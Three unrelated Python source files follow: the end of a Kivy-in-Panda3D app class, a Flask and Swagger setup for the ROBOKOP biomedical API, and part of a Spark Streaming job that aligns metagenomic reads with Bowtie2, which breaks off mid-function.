    The Kivy window cannot be created until Panda3D's pipeline has started
    drawing the region, so construction is deferred: a draw callback on the
    display region triggers init_window(), which builds the PandaWindow and
    (re-)enters run().
    """
    def __init__(self, panda_app, display_region=None, **kwargs):
        super().__init__(**kwargs)
        # Default to a region covering the whole Panda3D window.
        if display_region is None:
            display_region = panda_app.win.make_display_region(0, 1, 0, 1)
        self.window = None
        self.display_region = display_region
        self.panda_app = panda_app
        # Defer real setup until the region is first drawn.
        display_region.set_draw_callback(self.init_window)
    def init_window(self, *args):
        # init_window() called by multiple frames in the pipeline
        if not hasattr(self, 'display_region'):
            return
        display_region = self.display_region
        panda_app = self.panda_app
        # Deleting these attributes makes subsequent callbacks no-ops (see
        # the hasattr guard above).
        del self.display_region
        del self.panda_app
        # Clear the callback from the task manager, i.e. outside the draw.
        panda_app.taskMgr.add(lambda _: display_region.clear_draw_callback())
        self.window = PandaWindow(
            display_region=display_region,
            panda_app=panda_app,
            kivy_app=self,
        )
        if not self.root:
            self.run()  # root shouldn't be set before run() is called
    def run(self):
        if not self.window:
            return  # run() will be called from init_window()
        self.load_config()
        # XXX: Instantiate multiple apps, get the correct one in kvlang
        parser.global_idmap['app'] = self
        self.load_kv(filename=self.kv_file)
        self.window.setup_kivy_variables()
        root = self.build()
        if root:
            self.root = root
        # slave=True: Panda3D owns the main loop, not Kivy.
        runTouchApp(self.root, slave=True)
|
"""Set up Flask and flasgger."""
import os
import traceback
import logging
from flask import Flask, Blueprint
from flask_mail import Mail
from flask_restful import Api
from flask_cors import CORS
from flasgger import Swagger
import werkzeug
from manager import logging_config
logger = logging.getLogger(__name__)
# Set default static folder to point to parent static folder where all
# static assets can be stored and linked
app = Flask(__name__, static_folder='../pack', template_folder='../templates')
app.config.from_pyfile('robokop_flask_config.py')
mail = Mail(app)
# All REST resources live under /api.
api_blueprint = Blueprint('api', __name__, url_prefix='/api')
api = Api(api_blueprint)
app.register_blueprint(api_blueprint)
# OpenAPI document skeleton served by flasgger.
template = {
    "openapi": "3.0.1",
    "info": {
        "title": "ROBOKOP Manager",
        "description": "An API for management of biomedical questions and answers",
        "contact": {
            "name": "NCATS Gamma",
            "email": "patrick@covar.com",
            "url": "https://github.com/NCATS-Gamma",
        },
        "termsOfService": {
            "name": "mit"
        },
        "version": "0.0.1"
    },
    "schemes": [
        "http",
        "https"
    ],
    "tags": [
        {"name": "answers"},
        {"name": "questions"},
        {"name": "tasks"},
        {"name": "users"},
        {"name": "simple"},
        {"name": "util"},
        {"name": "util - builder"},
        {"name": "util - ranker"}
    ]
}
# flasgger runtime configuration: single spec, pinned Swagger UI assets.
swagger_config = {
    "headers": [
    ],
    "specs": [
        {
            "endpoint": 'apispec_1',
            "route": '/apispec_1.json',
            "rule_filter": lambda rule: True,  # all in
            "model_filter": lambda tag: True,  # all in
        }
    ],
    "swagger_ui": True,
    "specs_route": "/apidocs/",
    "openapi": "3.0.1",
    'swagger_ui_bundle_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui-bundle.js',
    'swagger_ui_standalone_preset_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui-standalone-preset.js',
    'swagger_ui_css': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui.css',
    'swagger_ui_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui.js'
}
app.config['SWAGGER'] = {
    'title': 'ROBOKOP Manager API',
    'uiversion': 3
}
swagger = Swagger(app, template=template, config=swagger_config)
@app.errorhandler(Exception)
def handle_error(ex):
    """Handle all server errors.

    HTTP exceptions pass through untouched so Flask can emit the proper
    status code; anything else is logged with its traceback and masked
    behind a generic 500 response.
    """
    if isinstance(ex, werkzeug.exceptions.HTTPException):
        return ex
    # logger.exception() records the full traceback itself. The previous
    # explicit traceback.format_exception(etype=...) call was unused, and
    # the `etype` keyword was removed in Python 3.10.
    logger.exception(ex)
    return "Internal server error. See the logs for details.", 500
# Also route plain 500s through the generic handler, and make exceptions
# propagate to it rather than being swallowed by Flask.
app.register_error_handler(500, handle_error)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.url_map.strict_slashes = False
# CORS is only opened for API routes.
CORS(app, resources=r'/api/*')
|
# coding: utf-8
# ---------------------------------------------------------------------------------------------------------------------
#
# Florida International University
#
# This software is a "Camilo Valdes Work" under the terms of the United States Copyright Act.
# Please cite the author(s) in any work or product based on this material.
#
# OBJECTIVE:
# The purpose of this file is to contain the principal Spark job function that is dispatched after the main Flint
# function has collected all the necessary files.#
#
# NOTES:
# Please see the dependencies section below for the required libraries (if any).
#
# DEPENDENCIES:
#
# • Biopython
#
# You can check the python modules currently installed in your system by running: python -c "help('modules')"
#
# USAGE:
# Run the program with the "--help" flag to see usage instructions.
#
# AUTHOR:
# Camilo Valdes (camilo@castflyer.com)
# Florida International University (FIU)
#
#
# ---------------------------------------------------------------------------------------------------------------------
# Python Modules
import os, sys
import time
from datetime import timedelta
import csv
import pprint as pp
from pathlib2 import Path
import shlex
import pickle
import json
import subprocess as sp
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
from pyspark.accumulators import AccumulatorParam
# ------------------------------------------------ Custom Classes -----------------------------------------------------
#
class AbundanceAccumulator(AccumulatorParam):
    """
    Spark accumulator that merges per-shard abundance dictionaries into one
    cluster-wide rolling dict. Adapted from the approach described at:
    https://stackoverflow.com/questions/44640184/accumulator-in-pyspark-with-dict-as-global-variable
    """
    def zero(self, value = ""):
        """Return the identity element for the accumulator: an empty dict."""
        return {}
    def addInPlace(self, value1, value2):
        """Fold the entries of value2 into value1 and return the merged dict."""
        value1.update(value2)
        return value1
# ---------------------------------------------------- Global ---------------------------------------------------------
#
# We know. Global vars are bad. The team is working very hard to refactor this, and we're hoping on removing them
# in an update soon.
#
# Path to the Bowtie2 executable on each worker node.
BOWTIE2_PATH = ""
# Path to the Bowtie2 index on each worker node.
BOWTIE2_INDEX_PATH = ""
# Name of the Bowtie2 index to align against.
BOWTIE2_INDEX_NAME = ""
# Number of threads handed to each Bowtie2 invocation.
BOWTIE2_THREADS = 2
# Count of shards (RDDs) processed so far; also used as a suffix for shard profile files.
RDD_COUNTER = 0
# Total number of shards the run expects to process before stopping.
NUMBER_OF_SHARDS_ALL = 0
# Wall-clock timestamps (0 until set) bracketing the analysis.
ANALYSIS_START_TIME = 0
ANALYSIS_END_TIME = 0
# Timestamp of the most recently processed RDD; drives the streaming-timeout check.
TIME_OF_LAST_RDD = 0
#
# Assorted methods for accessing the above.
#
def increment_rdd_count():
    """Advance the processed-RDD counter by one.

    The counter doubles as the numeric affix on per-shard profile files.
    """
    global RDD_COUNTER
    RDD_COUNTER += 1
def set_number_of_shards(num_shards_from_run):
    """Record how many shards this experimental run will stream in.

    Args:
        num_shards_from_run: Total shard count expected for the run.
    """
    global NUMBER_OF_SHARDS_ALL
    NUMBER_OF_SHARDS_ALL = num_shards_from_run
def get_shard_counter():
    """Return the number of shards processed so far, as an int."""
    # No 'global' needed for a read-only access.
    return int(RDD_COUNTER)
def get_shards():
    """Return the total number of shards requested for this run, as an int."""
    # Read-only access; no 'global' declaration required.
    return int(NUMBER_OF_SHARDS_ALL)
def shard_equals_counter():
    """Tell whether streaming should stop.

    Returns:
        True once the number of shards processed equals the requested total,
        False otherwise.
    """
    return get_shard_counter() == get_shards()
def set_analysis_start_time():
    """Stamp the analysis start time (called when the first shard arrives)."""
    global ANALYSIS_START_TIME
    ANALYSIS_START_TIME = time.time()
def set_analysis_end_time():
    """Stamp the analysis end time (called once every shard is processed)."""
    global ANALYSIS_END_TIME
    ANALYSIS_END_TIME = time.time()
def set_bowtie2_path(bowtie2_node_path):
    """Record where the Bowtie2 executable lives on the worker nodes.

    Args:
        bowtie2_node_path: Local-node path to Bowtie2; must match the path
            used by the "app-setup.sh" bootstrap script.
    """
    global BOWTIE2_PATH
    BOWTIE2_PATH = bowtie2_node_path
def get_bowtie2_path():
    """Return the local-node path of the Bowtie2 executable.

    Matches the path configured by the "app-setup.sh" bootstrap script.
    """
    return BOWTIE2_PATH
def set_bowtie2_index_path(bowtie2_index_path):
    """Record where the Bowtie2 index lives on each cluster node.

    Args:
        bowtie2_index_path: Local-node index path; must match the path used
            by the "app-setup.sh" bootstrap script.
    """
    global BOWTIE2_INDEX_PATH
    BOWTIE2_INDEX_PATH = bowtie2_index_path
def get_bowtie2_index_path():
    """Return the local-node path of the Bowtie2 index.

    Matches the path configured by the "app-setup.sh" bootstrap script.
    """
    return BOWTIE2_INDEX_PATH
def set_bowtie2_index_name(bowtie2_index_name):
    """Record the name of the Bowtie2 index to align against."""
    global BOWTIE2_INDEX_NAME
    BOWTIE2_INDEX_NAME = bowtie2_index_name
def get_bowtie2_index_name():
    """Return the name of the Bowtie2 index in use, as a string."""
    return BOWTIE2_INDEX_NAME
def set_bowtie2_number_threads(bowtie2_number_threads):
    """Record the thread count for Bowtie2 invocations.

    Args:
        bowtie2_number_threads: int, number of threads Bowtie2 may use.
    """
    global BOWTIE2_THREADS
    BOWTIE2_THREADS = bowtie2_number_threads
def get_bowtie2_number_threads():
    """Return the thread count currently configured for Bowtie2."""
    return BOWTIE2_THREADS
def set_time_of_last_rdd(time_of_last_rdd_processed):
    """Record when the most recent RDD finished processing.

    Args:
        time_of_last_rdd_processed: Timestamp (as produced by time.time()).
    """
    global TIME_OF_LAST_RDD
    TIME_OF_LAST_RDD = time_of_last_rdd_processed
def get_time_of_last_rdd():
    """Return the timestamp at which the last RDD ended processing."""
    return TIME_OF_LAST_RDD
#
# Dictionary.
# The 'OVERALL_ABUNDANCES' dictionary contains the rolling sum of the abundances from each of the
# ingested shards. When there are no more shards to process, we write the abundances to a file.
#
# Rolling sum of abundances across all ingested shards. Starts as a plain dict;
# at run time set_overall_abundances() replaces it (e.g. with a Spark accumulator).
OVERALL_ABUNDANCES = {}
def set_overall_abundances(abundance_acc):
    """Point the module-wide abundance store at the given accumulator/dict."""
    global OVERALL_ABUNDANCES
    OVERALL_ABUNDANCES = abundance_acc
def get_overall_abundaces():
    """Return the rolling abundance store.

    NOTE: the misspelled name ("abundaces") is kept for backward compatibility
    with existing callers.
    """
    return OVERALL_ABUNDANCES
# -------------------------------------------- Stream from a Directory ------------------------------------------------
#
#
def dispatch_stream_from_dir(stream_source_dir, sampleID, sample_format, output_file, save_to_local, save_to_s3,
                             partition_size, ssc, sensitive_align, annotations_dictionary, s3_output_bucket,
                             number_of_shards, keep_shard_profiles, coalesce_output, sample_type, verbose_output,
                             debug_mode, streaming_timeout):
    """
    Executes the requested Spark job in the cluster using a streaming strategy, picking up
    sample shards from a directory that Spark monitors.
    Args:
        stream_source_dir:      The directory to stream files from.
        sampleID:               The unique id of the sample.
        sample_format:          What type of input format are the reads in (tab5, fastq, tab6, etc.).
        output_file:            The path to the output file.
        save_to_local:          Flag for storing output to the local filesystem.
        save_to_s3:             Flag for storing output to AWS S3.
        partition_size:         Level of parallelization for RDDs that are not partitioned by the system.
        ssc:                    Spark Streaming Context.
        sensitive_align:        Sensitive Alignment Mode.
        annotations_dictionary: Dictionary of Annotations for reporting organism names.
        s3_output_bucket:       The S3 bucket to write files into.
        number_of_shards:       The number of shards that we'll be picking up from 'stream_source_dir'.
        keep_shard_profiles:    Retains the rolling shard profiles in S3 or the local filesystem.
        coalesce_output:        Merge output into a single file.
        sample_type:            Are the reads single-end or paired-end.
        verbose_output:         Flag for wordy terminal print statements.
        debug_mode:             Flag for debug mode. Activates slow checkpoints.
        streaming_timeout:      Time (in sec) after which streaming will stop.
    Returns:
        Nothing, if all goes well it should return cleanly.
    """
    # Announce the run parameters before streaming starts.
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
          "] Stream Source: [DIRECTORY]")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Sample ID: " + sampleID +
          " (" + sample_format + ", " + sample_type + ")")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Number of Sample Shards: " +
          str(number_of_shards))
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Streaming starting...")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
          "] Please copy reads into streaming directory.")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Waiting for input...")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
    # Set the number of shards so that we can safely exit after we have analyzed the requested number of shards.
    set_number_of_shards(int(number_of_shards))
    # Directory streams arrive as plain text, so no Kinesis JSON decoding is needed downstream.
    kinesis_decode = False
    # Tab5-formatted FASTQ reads.
    if sample_format == "tab5":
        #
        # Before we do anything, we have to move the data back to the Master. The way Spark Streaming works, is that
        # the RDDs will be processed in the Worker in which they were received, which does not parallelize well.
        # If we did not ship the input reads back to the master, then they would only be aligned in one Executor.
        #
        sc = ssc.sparkContext
        # Custom accumulator that merges each shard's abundance dict into a cluster-wide rolling total.
        overall_abundance_accumulator = sc.accumulator({}, AbundanceAccumulator())
        set_overall_abundances(overall_abundance_accumulator)
        # In this approach, we'll stream the reads from a S3 directory that we monitor with Spark.
        sample_dstream = ssc.textFileStream(stream_source_dir)
        # Every micro-batch (one shard) is handed to profile_sample() for alignment + profiling.
        sample_dstream.foreachRDD(lambda rdd: profile_sample(sampleReadsRDD=rdd,
                                                             sc=sc,
                                                             ssc=ssc,
                                                             output_file=output_file,
                                                             save_to_s3=save_to_s3,
                                                             save_to_local=save_to_local,
                                                             sample_type=sample_type,
                                                             sensitive_align=sensitive_align,
                                                             annotations_dictionary=annotations_dictionary,
                                                             partition_size=partition_size,
                                                             s3_output_bucket=s3_output_bucket,
                                                             kinesis_decode=kinesis_decode,
                                                             keep_shard_profiles=keep_shard_profiles,
                                                             coalesce_output=coalesce_output,
                                                             verbose_output=verbose_output,
                                                             debug_mode=debug_mode,
                                                             streaming_timeout=streaming_timeout,
                                                             bowtie2_node_path=get_bowtie2_path(),
                                                             bowtie2_index_path=get_bowtie2_index_path(),
                                                             bowtie2_index_name=get_bowtie2_index_name(),
                                                             bowtie2_number_threads=get_bowtie2_number_threads()))
        # ---------------------------------------- Start Streaming ----------------------------------------------------
        #
        #
        ssc.start()  # Start to schedule the Spark job on the underlying Spark Context.
        ssc.awaitTermination()  # Wait for the streaming computations to finish.
        ssc.stop()  # Stop the Streaming context
# -------------------------------------------- Stream from a Directory ------------------------------------------------
#
#
def dispatch_stream_from_kinesis(sampleID, sample_format, output_file, save_to_local, save_to_s3, partition_size, ssc,
                                 app_name, stream_name, endpoint_url, region_name, keep_shard_profiles,
                                 sensitive_align, annotations_dictionary, s3_output_bucket, coalesce_output,
                                 number_of_shards, sample_type, verbose_output, debug_mode, streaming_timeout):
    """
    Executes the requested Spark job in the cluster using a streaming strategy, ingesting
    sample shards from an AWS Kinesis stream.
    Args:
        sampleID:               The unique id of the sample.
        sample_format:          What type of input format are the reads in (tab5, fastq, tab6, etc.).
        output_file:            The path to the output file.
        save_to_local:          Flag for storing output to the local filesystem.
        save_to_s3:             Flag for storing output to AWS S3.
        partition_size:         Level of parallelization for RDDs that are not partitioned by the system.
        ssc:                    Spark Streaming Context.
        app_name:               Kinesis app name.
        stream_name:            Kinesis stream name.
        endpoint_url:           Kinesis Stream URL.
        region_name:            Amazon region name for the Kinesis stream.
        keep_shard_profiles:    Retains the rolling shard profiles in S3 or the local filesystem.
        sensitive_align:        Sensitive Alignment Mode.
        annotations_dictionary: Dictionary of Annotations for reporting organism names.
        s3_output_bucket:       The S3 bucket to write files into.
        coalesce_output:        Merge output into a single file.
        number_of_shards:       The number of shards that we'll be picking up from the Kinesis stream.
        sample_type:            Are the reads single-end or paired-end.
        verbose_output:         Flag for wordy terminal print statements.
        debug_mode:             Flag for debug mode. Activates slow checkpoints.
        streaming_timeout:      Time (in sec) after which streaming will stop.
    Returns:
        Nothing, if all goes well it should return cleanly.
    """
    # Announce the run parameters before streaming starts.
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
          "] Stream Source: [KINESIS]")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Sample ID: " + sampleID +
          " (" + sample_format + ", " + sample_type + ")")
    # NOTE(review): this line is labeled "Stream Name" but prints 'endpoint_url',
    # not 'stream_name' — confirm which value was intended.
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Stream Name: " + endpoint_url)
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Region: " + region_name)
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Streaming starting...")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
    # Set the number of shards so that we can safely exit after we have analyzed the requested number of shards.
    set_number_of_shards(int(number_of_shards))
    # Kinesis payloads are JSON-encoded, so profile_sample() must decode them first.
    kinesis_decode = True
    # Tab5-formatted FASTQ reads.
    if sample_format == "tab5":
        #
        # Kinesis streaming
        #
        sample_dstream = KinesisUtils.createStream(ssc,
                                                   app_name,
                                                   stream_name,
                                                   endpoint_url,
                                                   region_name,
                                                   InitialPositionInStream.TRIM_HORIZON,
                                                   5)
        #
        # Before we do anything, we have to move the data back to the Master. The way Spark Streaming works, is that
        # the RDDs will be processed in the Worker in which they were received, which does not parallelize well.
        # If we did not ship the input reads back to the master, then they would only be aligned in one Executor.
        #
        sc = ssc.sparkContext
        # Every micro-batch (one shard) is handed to profile_sample() for alignment + profiling.
        sample_dstream.foreachRDD(lambda rdd: profile_sample(sampleReadsRDD=rdd,
                                                             sc=sc,
                                                             ssc=ssc,
                                                             output_file=output_file,
                                                             save_to_s3=save_to_s3,
                                                             save_to_local=save_to_local,
                                                             sample_type=sample_type,
                                                             sensitive_align=sensitive_align,
                                                             annotations_dictionary=annotations_dictionary,
                                                             partition_size=partition_size,
                                                             s3_output_bucket=s3_output_bucket,
                                                             kinesis_decode=kinesis_decode,
                                                             keep_shard_profiles=keep_shard_profiles,
                                                             coalesce_output=coalesce_output,
                                                             verbose_output=verbose_output,
                                                             debug_mode=debug_mode,
                                                             streaming_timeout=streaming_timeout,
                                                             bowtie2_node_path=get_bowtie2_path(),
                                                             bowtie2_index_path=get_bowtie2_index_path(),
                                                             bowtie2_index_name=get_bowtie2_index_name(),
                                                             bowtie2_number_threads=get_bowtie2_number_threads()))
        # ---------------------------------------- Start Streaming ----------------------------------------------------
        #
        #
        ssc.start()  # Start to schedule the Spark job on the underlying Spark Context.
        ssc.awaitTermination()  # Wait for the streaming computations to finish.
        ssc.stop()  # Stop the Streaming context
# --------------------------------------------- Processing Functions --------------------------------------------------
#
# This is where all the action is. This function gets called by both of the streaming job functions, and the code
# for passing the data to Bowtie2, and receiving it back, is in these functions.
#
def profile_sample(sampleReadsRDD, sc, ssc, output_file, save_to_s3, save_to_local, sensitive_align, partition_size,
                   annotations_dictionary, s3_output_bucket, keep_shard_profiles, coalesce_output, verbose_output,
                   bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads, sample_type,
                   debug_mode, streaming_timeout, kinesis_decode=None):
    """
    Profiles a single streamed shard: aligns its reads with Bowtie2 on the worker nodes, then runs a
    chain of map/reduce steps that turn raw alignments into Strain-level abundances, and finally
    writes (or accumulates) the shard's profile. Called from both streaming dispatchers via
    'foreachRDD()'.
    Args:
        sampleReadsRDD:         RDD with the shard's reads, delivered by Spark Streaming.
        sc:                     Spark Context.
        ssc:                    Spark Streaming Context (stopped from here once all shards are done).
        output_file:            The path to the output file.
        save_to_s3:             Flag for storing output to AWS S3.
        save_to_local:          Flag for storing output to the local filesystem.
        sensitive_align:        Sensitive Alignment Mode.
        partition_size:         Level of parallelization for RDDs that are not partitioned by the system.
        annotations_dictionary: Dictionary of Annotations for reporting organism names.
        s3_output_bucket:       The S3 bucket to write files into.
        keep_shard_profiles:    Retains the rolling shard profiles in S3 or the local filesystem.
        coalesce_output:        Accumulate abundances across shards instead of writing each shard.
        verbose_output:         Flag for wordy terminal print statements.
        bowtie2_node_path:      Path to the Bowtie2 executable on each worker node.
        bowtie2_index_path:     Path to the Bowtie2 index on each worker node.
        bowtie2_index_name:     Name of the Bowtie2 index.
        bowtie2_number_threads: Number of threads for each Bowtie2 invocation.
        sample_type:            Are the reads single-end or paired-end.
        debug_mode:             Flag for debug mode. Activates slow checkpoints.
        streaming_timeout:      Time (in sec) after which streaming will stop.
        kinesis_decode:         If truthy, the incoming shard is a Kinesis payload that must be
                                JSON-decoded before use.
    Returns:
        Nothing. Any exception is caught, printed, and swallowed so the streaming loop keeps going.
    """
    #
    # Nested inner function that gets called from the 'mapPartitions()' Spark function.
    #
    def align_with_bowtie2(iterator):
        """
        Function that runs on ALL worker nodes (Executors). Dispatches a Bowtie2 command and handles read alignments.
        Args:
            iterator: Iterator object from Spark
        Returns: An iterable collection of read alignments in SAM format.
        """
        alignments = []
        # NOTE(review): 'worker_node_ip' is never used below; presumably kept for debugging.
        worker_node_ip = str(sp.check_output(["hostname"])).strip()
        #
        # We pick up the RDD with reads that we set as a broadcast variable "previously" — The location of this
        # action happens in the code below, which executes before 'this' code block.
        #
        reads_list = broadcast_sample_reads.value
        # Obtain a properly formatted Bowtie2 command.
        bowtieCMD = getBowtie2Command(bowtie2_node_path=bowtie2_node_path,
                                      bowtie2_index_path=bowtie2_index_path,
                                      bowtie2_index_name=bowtie2_index_name,
                                      bowtie2_number_threads=bowtie2_number_threads)
        if sensitive_align:
            bowtieCMD = getBowtie2CommandSensitive(bowtie2_node_path=bowtie2_node_path,
                                                   bowtie2_index_path=bowtie2_index_path,
                                                   bowtie2_index_name=bowtie2_index_name,
                                                   bowtie2_number_threads=bowtie2_number_threads)
        # Open a pipe to the subprocess that will launch the Bowtie2 aligner.
        try:
            align_subprocess = sp.Popen(bowtieCMD, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE)
            # NOTE(review): the reads are pickled and pushed through stdin after a latin-1 decode,
            # and the output is later '.decode()'d — this wire protocol looks Python-2 era; on
            # Python 3 Popen without text mode expects bytes on stdin. Confirm against the
            # companion mapping script before touching it.
            pickled_reads_list = pickle.dumps(reads_list)
            # no_reads = len(reads_list)
            alignment_output, alignment_error = align_subprocess.communicate(input=pickled_reads_list.decode('latin-1'))
            # The output is returned as a 'bytes' object, so we'll convert it to a list. That way, 'this' worker node
            # will return a list of the alignments it found.
            for a_read in alignment_output.strip().decode().splitlines():
                # Each alignment (in SAM format) is parsed and broken down into two (2) pieces: the read name,
                # and the genome reference the read aligns to. We do the parsing here so that it occurs in the
                # worker node and not in the master node. A benefit of parsing alignments in the worker node is
                # that it also brings down the size of the 'alignment' object that gets transmitted through the
                # network. Note that networking costs are minimal for a 'few' alignments, but they do add up
                # for large samples with many shards.
                #
                # SAM format: [0] - QNAME (the read name)
                #             [1] - FLAG
                #             [2] - RNAME (the genome reference name that the read aligns to
                #
                alignment = a_read.split("\t")[0] + "\t" + a_read.split("\t")[2]
                # Once the alignment has been parsed, we add it to the return list of alignments that will be
                # sent back to the master node.
                alignments.append(alignment)
        # NOTE(review): Popen.communicate() does not raise CalledProcessError (only check_call/
        # check_output do), so this handler is effectively unreachable — confirm intended behavior.
        except sp.CalledProcessError as err:
            print( "[Flint - ALIGN ERROR] " + str(err))
            sys.exit(-1)
        return iter(alignments)
    # -----------------------------------------------------------------------------------------------------------------
    #
    #
    def get_organism_name(gca_id):
        """
        Nested function for retrieving and constructing a proper organism name for the reports.
        Args:
            gca_id: The 'GCA' formatted ID to look up in the annotations.
        Returns:
            A properly formatted string for the organism name that contains a Taxa_ID, Genus-Species-Strain name,
            and the GCA_ID that was used for the query. Falls back to the bare GCA id when it is
            not present in the annotations.
        """
        organism_name_string = ""
        if gca_id in annotations_dictionary:
            taxa_id = annotations_dictionary[gca_id]['taxa_id']
            organism_name = annotations_dictionary[gca_id]['organism_name']
            organism_name_string = str(taxa_id) + "\t" + str(gca_id) + "\t" + str(organism_name)
        else:
            organism_name_string = gca_id
        return organism_name_string
    # -----------------------------------------------------------------------------------------------------------------
    #
    #
    def accumulate_abundaces(a_strain):
        """
        Folds a single (strain, abundance) pair into the global rolling-abundance store.
        Runs inside a Spark 'map()', so OVERALL_ABUNDANCES is expected to be the accumulator
        installed by set_overall_abundances() (accumulators support '+=' via add()).
        """
        print("Hello from accumulate_abundances()")
        strain_name = a_strain[0]
        abundance_count = a_strain[1]
        # abundances = get_overall_abundaces()
        global OVERALL_ABUNDANCES
        OVERALL_ABUNDANCES += {strain_name: abundance_count}
        return a_strain
    # -----------------------------------------------------------------------------------------------------------------
    #
    # The main 'profileSample()' function starts here.
    #
    try:
        if not sampleReadsRDD.isEmpty():
            # First shard of the run: stamp the analysis start time.
            if get_shard_counter() == 0:
                set_analysis_start_time()
            # -------------------------------------- Alignment --------------------------------------------------------
            #
            # First, we'll convert the RDD to a list, which we'll then convert to a Spark.broadcast variable
            # that will be shipped to all the Worker Nodes (and their Executors) for read alignment.
            #
            if kinesis_decode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Decoding Kinesis Stream...")
                # NOTE(review): collect() returns a list, but json.loads() expects a string —
                # confirm the shape of the Kinesis payload this is fed.
                sample_reads_list = json.loads(sampleReadsRDD.collect())
            else:
                sample_reads_list = sampleReadsRDD.collect()  # collect returns <type 'list'> on the main driver.
            number_input_reads = len(sample_reads_list)
            #
            # The RDD with reads is set as a Broadcast variable that will be picked up by each worker node.
            #
            broadcast_sample_reads = sc.broadcast(sample_reads_list)
            #
            # Run starts here.
            #
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Shard: " +
                  str(get_shard_counter()) + " of " + str(get_shards()))
            read_noun = ""
            if sample_type.lower() == "paired":
                # BUG FIX: this was 'read_noun == "Paired-End"' (a no-op comparison), so the
                # noun never appeared in the log line below. It is now an assignment.
                read_noun = "Paired-End"
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Input: " +
                  '{:0,.0f}'.format(number_input_reads) + " " + read_noun + " Reads.")
            alignment_start_time = time.time()
            # An empty-ish RDD whose only purpose is to fan the broadcast reads out to
            # 'partition_size' partitions, one Bowtie2 run per partition.
            data = sc.parallelize(range(1, partition_size))
            data_num_partitions = data.getNumPartitions()
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] No. RDD Partitions: " +
                      str(data_num_partitions))
            #
            # Dispatch the Alignment job with Bowtie2
            #
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                  "] Aligning reads with Bowtie2 (" + str(bowtie2_number_threads) + ")...")
            if sensitive_align:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Using Sensitive Alignment Mode...")
            alignments_RDD = data.mapPartitions(align_with_bowtie2)
            # count() forces evaluation, i.e., it actually runs the alignments.
            number_of_alignments = alignments_RDD.count()
            alignment_end_time = time.time()
            alignment_total_time = alignment_end_time - alignment_start_time
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Bowtie2 - Complete. " +
                  "(" + str(timedelta(seconds=alignment_total_time)) + ")")
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Found: " +
                  '{:0,.0f}'.format(number_of_alignments) + " Alignments.")
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                  "] Analyzing...")
            # ------------------------------------------- Map 1 -------------------------------------------------------
            #
            # The Map step sets up the basic data structure that we start with — a map of reads to the genomes they
            # align to. We'll Map a read (QNAME) with a genome reference name (RNAME).
            # The REDUCE 1 step afterwards will collect all the genomes and key them to a unique read name.
            #
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Mapping Reads to Genomes (QNAME-RNAME).")
            map_reads_to_genomes = alignments_RDD.map(lambda line: (line.split("\t")[0], [line.split("\t")[1]])).cache()
            if debug_mode:
                # Debug checkpoints force evaluation with count() so each stage can be timed
                # individually; the checkpoint_N results themselves are intentionally unused.
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 1: Map 1, map_reads_to_genomes")
                chk_1_s = time.time()
                checkpoint_1 = map_reads_to_genomes.count()
                chk_1_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_1_e - chk_1_s))))
            if verbose_output:
                # We use the following block to get the Overall Mapping Rate for 'this' shard.
                list_unique_reads = map_reads_to_genomes.flatMap(lambda x: x).keys().distinct()
                number_of_reads_aligned = list_unique_reads.count()
                overall_mapping_rate = float(number_of_reads_aligned) / number_input_reads
                overall_mapping_rate = overall_mapping_rate * 100
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Shard Mapping Rate: " +
                      '{:.2f}'.format(overall_mapping_rate) + "%")
            # ------------------------------------------ Reduce 1 -----------------------------------------------------
            #
            # Reduce will operate first by calculating the read contributions, and then using these contributions
            # to calculate an abundance.
            # Note the "+" operator can be used to concatenate two lists. :)
            #
            # 'Reduce by Reads' will give us a 'dictionary-like' data structure that contains a Read Name (QNAME) as
            # the KEY, and a list of genome references (RNAME) as the VALUE. This allows us to calculate
            # each read's contribution.
            #
            if verbose_output:
